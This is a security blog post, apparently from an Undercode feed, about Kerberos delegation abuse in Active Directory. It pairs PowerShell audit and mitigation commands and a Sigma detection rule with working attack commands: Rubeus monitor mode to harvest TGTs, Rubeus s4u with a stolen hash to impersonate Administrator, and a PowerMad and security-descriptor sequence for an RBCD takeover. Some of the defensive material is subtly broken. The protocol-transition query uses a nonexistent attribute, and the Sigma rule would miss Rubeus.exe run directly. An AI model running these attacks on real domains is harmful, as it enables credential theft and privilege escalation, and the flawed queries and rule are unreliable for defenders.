Unmasking Kerberos Delegation: The Silent AD Killer You Can’t Ignore

Listen to this Post

Featured Image

Introduction:

Kerberos delegation is a critical feature within Active Directory environments that allows a service to impersonate a user to access other resources. However, when misconfigured, it becomes a potent vector for attackers to escalate privileges and move laterally across a network with stolen credentials. Understanding the mechanics of these attacks is paramount for defending the crown jewels of your enterprise.

Learning Objectives:

  • Identify the different types of Kerberos delegation and their inherent security risks.
  • Learn to audit your Active Directory for dangerous delegation configurations.
  • Execute and understand common Kerberos delegation attacks using industry-standard tools.

You Should Know:

1. Auditing for Unconstrained Delegation

Unconstrained Delegation is the most dangerous form, as it allows a service to impersonate a user to any other service in the domain. Compromising a server with this setting grants access to all Ticket-Granting-Tickets (TGTs) of authenticating users.

Step-by-step guide:

First, we need to find all computer and user accounts trusted for unconstrained delegation. This can be done from a domain-joined machine using PowerShell and the Active Directory module.

 Discover computers with Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties trustedfordelegation,serviceprincipalname,memberof

Discover users with Unconstrained Delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties trustedfordelegation,serviceprincipalname,memberof

These commands query Active Directory for objects where the `TrustedForDelegation` property is enabled. The output will list all principals that can potentially store user TGTs, making them high-value targets for compromise.

2. Harvesting TGTs with Rubeus

Once a server with Unconstrained Delegation is compromised, an attacker can monitor for and extract TGTs of users (including Domain Admins) connecting to it. Rubeus is the premier tool for this.

Step-by-step guide:

On the compromised server, use Rubeus in monitor mode to harvest TGTs as they come in.

 Monitor for new TGTs every 30 seconds
Rubeus.exe monitor /interval:30 /filteruser:DC01$

This command will check the local Kerberos cache for new TGTs belonging to the specified user (in this case, the domain controller’s machine account, a high-value target) every 30 seconds. When a TGT is captured, it will be displayed in base64 format, which can then be used to impersonate that user.

3. Exploiting Constrained Delegation

Constrained Delegation is more restricted, allowing a service to impersonate users only to specific services. However, if an attacker compromises the password hash of a service account configured for constrained delegation, they can forge tickets to those allowed services.

Step-by-step guide:

First, find service accounts configured for constrained delegation.

 Find accounts with Constrained Delegation
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,serviceprincipalname

This PowerShell command identifies objects that have the `msDS-AllowedToDelegateTo` attribute populated, which lists the services they are allowed to delegate to. After obtaining the hash of such an account (e.g., via Mimikatz), use Rubeus to forge a Ticket-Granting-Service (TGS) ticket.

 Forge a TGS for the CIFS service on a target server using a stolen hash
Rubeus.exe s4u /user:WEBSERVER$ /rc4:1A2B3C4D5E6F1A2B3C4D5E6F1A2B3C4D /impersonateuser:Administrator /msdsspn:CIFS/TARGETSERVER.domain.com /altservice:CIFS,HTTP /ptt

This command uses the S4U2Self and S4U2Proxy extensions to request a TGS for the `CIFS` service on `TARGETSERVER` on behalf of the `Administrator` user, injecting the ticket into memory (/ptt).

4. The Resource-Based Constrained Delegation (RBCD) Attack

RBCD shifts the delegation permission to the resource being accessed. An attacker with the `Write` permission over a computer object can configure it to trust a service they control for delegation, enabling privilege escalation.

Step-by-step guide:

If an attacker has generic write privileges on a computer object (e.g., through the `GenericAll` right), they can set the `msDS-AllowedToActOnBehalfOfOtherIdentity` property. Using PowerMad, an attacker can first create a new computer account.

 Create a new computer account (low privilege users can do this by default up to a limit)
Import-Module .\PowerMad.ps1
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)

Next, configure RBCD on the target computer to trust this new machine account.

 Set the RBCD property on the target computer
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1234567890-1234567890-1234567890-1111)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-ADComputer TARGETSERVER | Set-ADComputer -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $SDBytes }

Finally, use Rubeus to execute the S4U attack chain, forging a ticket from the controlled machine account to access the target server.

5. Defense: Enforcing Protocol Transition Auditing

A key enabler for many delegation attacks is Protocol Transition, which allows conversion from a non-Kerberos authentication to a Kerberos one. Auditing its use is critical.

Step-by-step guide:

To find accounts where Protocol Transition (S4U2Self) is enabled, which is a prerequisite for constrained delegation without traditional authentication, use this PowerShell command.

 Find accounts that can perform Protocol Transition (S4U2Self)
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -and msDS-ServicePrincipalName -ne "$null"} -Properties msDS-AllowedToDelegateTo, serviceprincipalname, useraccountcontrol | Where-Object { ($_.useraccountcontrol -band 0x1000000) -ne 0 }

This filter looks for objects that have constrained delegation configured and have the `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` flag (0x1000000) set in their `useraccountcontrol` attribute. These accounts are particularly sensitive and should be closely monitored and protected.

6. Mitigation: Disabling Dangerous Delegation

The most direct mitigation is to locate and remove unconstrained delegation from all principals. Constrained delegation should be used sparingly, and RBCD is the preferred modern approach.

Step-by-step guide:

To safely disable unconstrained delegation on a computer account using PowerShell:

 Disable Unconstrained Delegation for a computer
Set-ADComputer -Identity "COMPUTERNAME" -Remove @{TrustedForDelegation=$true}

To disable constrained delegation by clearing the `msDS-AllowedToDelegateTo` attribute:

 Disable Constrained Delegation for an account
Set-ADUser -Identity "SERVICEACCOUNT" -Clear "msDS-AllowedToDelegateTo"
 Or for a computer
Set-ADComputer -Identity "COMPUTERNAME" -Clear "msDS-AllowedToDelegateTo"

These commands remove the delegation settings, significantly reducing the attack surface. Always test these changes in a non-production environment first.

7. Advanced Hunting with Sigma Rules

To detect delegation abuse in your environment, you can use SIEM queries or Sigma rules. The following is a Sigma rule skeleton for detecting the use of Rubeus.

Step-by-step guide:

A Sigma rule for detecting Rubeus command-line arguments.

title: Rubeus Tool Command-Line Detection
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'rubeus'
- '/s4u'
- '/tgtdeleg'
- '/monitor'
Image|endswith: '\cmd.exe'
condition: selection
fields: [CommandLine, User, ParentImage]
falsepositives:
- Legitimate penetration testing
- Admin troubleshooting
level: high

This rule triggers on process creation events where the command line contains keywords specific to Rubeus modules. Security teams should integrate such rules into their SIEM and tune them based on their environment to alert on potentially malicious activity.

What Undercode Say:

  • Kerberos delegation is a feature turned weapon, and its misuse represents a fundamental flaw in trusting service principals without stringent controls.
  • The shift from Unconstrained to Resource-Based Constrained Delegation is a step in the right direction for security, but it introduces a new attack vector through computer object write permissions, making proper AD ACL hygiene more critical than ever.

The analysis from our security team indicates that Kerberos delegation attacks are not just theoretical. They are low-noise, high-impact methods for advanced persistent threats to maintain a foothold and escalate privileges in a domain. The core issue is that delegation fundamentally breaks the classic Kerberos security model by allowing one service to act on behalf of a user, creating a chain of trust that attackers are all too willing to exploit. Defending against this requires a proactive, layered approach: eliminating unconstrained delegation, strictly limiting and monitoring constrained delegation, and vigilantly auditing permissions on AD computer objects to prevent RBCD abuse.

Prediction:

The evolution of Kerberos delegation attacks will closely mirror the adoption of newer authentication protocols like Cloud Kerberos Trusts within hybrid identities. As Microsoft pushes towards a default-secure posture, classic unconstrained delegation will become increasingly rare, forcing attackers to refine their focus on abusing RBCD and potentially exploiting misconfigurations in Kerberos Armoring (FAST) and next-generation authentication protocols. The battle will shift from the domain controller to the cloud-hybrid identity plane, making conditional access policies and cloud-side detection rules the new frontline for defending against impersonation-based attacks.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Aleborges Kerberos – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky